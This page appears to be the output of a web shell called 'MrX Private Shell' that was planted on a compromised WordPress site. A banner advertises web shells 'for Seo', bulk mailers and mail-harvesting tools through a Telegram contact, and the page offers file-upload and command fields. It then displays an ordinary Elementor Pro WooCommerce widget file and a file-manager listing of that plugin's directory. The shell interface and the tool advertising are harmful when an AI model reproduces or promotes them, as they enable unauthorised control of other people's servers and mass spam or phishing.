__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
<?php
namespace ElementorPro\Modules\Woocommerce\Widgets;

use Elementor\Controls_Manager;
use ElementorPro\Modules\QueryControl\Module as QueryModule;
use ElementorPro\Modules\Woocommerce\Module;

if ( ! defined( 'ABSPATH' ) ) {
	exit; // Exit if accessed directly
}

class Elements extends Base_Widget {

	public function get_name() {
		return 'wc-elements';
	}

	public function get_title() {
		return esc_html__( 'WooCommerce Pages', 'elementor-pro' );
	}

	public function get_icon() {
		return 'eicon-product-pages';
	}

	public function on_export( $element ) {
		unset( $element['settings']['product_id'] );

		return $element;
	}

	public function get_keywords() {
		return [
			'woocommerce',
			'shop',
			'store',
			'cart',
			'checkout',
			'account',
			'order tracking',
			'shortcode',
			'product',
		];
	}

	public function get_categories() {
		return [
			'woocommerce-elements',
		];
	}

	protected function register_controls() {
		$this->start_controls_section(
			'section_product',
			[
				'label' => esc_html__( 'Element', 'elementor-pro' ),
			]
		);

		$this->add_control(
			'element',
			[
				'label' => esc_html__( 'Page', 'elementor-pro' ),
				'type' => Controls_Manager::SELECT,
				'options' => [
					'' => '— ' . esc_html__( 'Select', 'elementor-pro' ) . ' —',
					'woocommerce_cart' => esc_html__( 'Cart Page', 'elementor-pro' ),
					'product_page' => esc_html__( 'Single Product Page', 'elementor-pro' ),
					'woocommerce_checkout' => esc_html__( 'Checkout Page', 'elementor-pro' ),
					'woocommerce_order_tracking' => esc_html__( 'Order Tracking Form', 'elementor-pro' ),
					'woocommerce_my_account' => esc_html__( 'My Account', 'elementor-pro' ),
				],
			]
		);

		$this->add_control(
			'product_id',
			[
				'label' => esc_html__( 'Product', 'elementor-pro' ),
				'type' => QueryModule::QUERY_CONTROL_ID,
				'options' => [],
				'label_block' => true,
				'autocomplete' => [
					'object' => QueryModule::QUERY_OBJECT_POST,
					'query' => [
						'post_type' => [ 'product' ],
					],
				],
				'condition' => [
					'element' => [ 'product_page' ],
				],
			]
		);

		$this->end_controls_section();
	}

	private function get_shortcode() {
		$settings = $this->get_settings();

		switch ( $settings['element'] ) {
			case '':
				return '';
				break;

			case 'product_page':
				if ( ! empty( $settings['product_id'] ) ) {
					$product_data = get_post( $settings['product_id'] );
					$product = ! empty( $product_data ) && in_array( $product_data->post_type, [ 'product', 'product_variation' ] ) ? wc_setup_product_data( $product_data ) : false;
				}

				if ( empty( $product ) && current_user_can( 'manage_options' ) ) {
					return esc_html__( 'Please set a valid product', 'elementor-pro' );
				}

				$this->add_render_attribute( 'shortcode', 'id', $settings['product_id'] );
				break;

			case 'woocommerce_cart':
			case 'woocommerce_checkout':
			case 'woocommerce_order_tracking':
				break;
		}

		$shortcode = sprintf(
			'[%s %s]',
			esc_html( $settings['element'] ),
			$this->get_render_attribute_string( 'shortcode' )
		);

		return $shortcode;
	}

	protected function render() {
		$shortcode = $this->get_shortcode();

		if ( empty( $shortcode ) ) {
			return;
		}

		Module::instance()->add_products_post_class_filter();

		$html = do_shortcode( $shortcode );

		if ( 'woocommerce_checkout' === $this->get_settings( 'element' ) && '<div class="woocommerce"></div>' === $html ) {
			$html = '<div class="woocommerce">' . esc_html__( 'Your cart is currently empty.', 'elementor-pro' ) . '</div>';
		}

		// PHPCS - Woocommerce output
		echo $html; // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped

		Module::instance()->remove_products_post_class_filter();
	}

	public function render_plain_content() {
		// PHPCS - Already escaped in get_shortcode
		echo $this->get_shortcode(); // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped
	}

	public function get_group_name() {
		return 'woocommerce';
	}
}

Filemanager

Name Type Size Permission Actions
add-to-cart.php File 8.32 KB 0664
archive-description.php File 3.02 KB 0664
archive-products-deprecated.php File 3.61 KB 0664
archive-products.php File 4.57 KB 0664
base-widget.php File 4.37 KB 0664
breadcrumb.php File 3.11 KB 0664
cart.php File 72.49 KB 0664
categories.php File 10.56 KB 0664
category-image.php File 1.36 KB 0664
checkout.php File 120.99 KB 0664
elements.php File 3.92 KB 0664
menu-cart.php File 58.3 KB 0664
my-account.php File 67.54 KB 0664
notices.php File 3.52 KB 0664
product-add-to-cart.php File 21.17 KB 0664
product-additional-information.php File 2.88 KB 0664
product-content.php File 804 B 0664
product-data-tabs.php File 7.99 KB 0664
product-images.php File 6.15 KB 0664
product-meta.php File 13.31 KB 0664
product-price.php File 4.89 KB 0664
product-rating.php File 4.78 KB 0664
product-related.php File 7.29 KB 0664
product-short-description.php File 3.08 KB 0664
product-stock.php File 2.12 KB 0664
product-title.php File 2 KB 0664
product-upsell.php File 6.45 KB 0664
products-base.php File 28.36 KB 0664
products-deprecated.php File 6.97 KB 0664
products.php File 10.17 KB 0664
purchase-summary.php File 42.61 KB 0664
single-elements.php File 4.12 KB 0664
Filemanager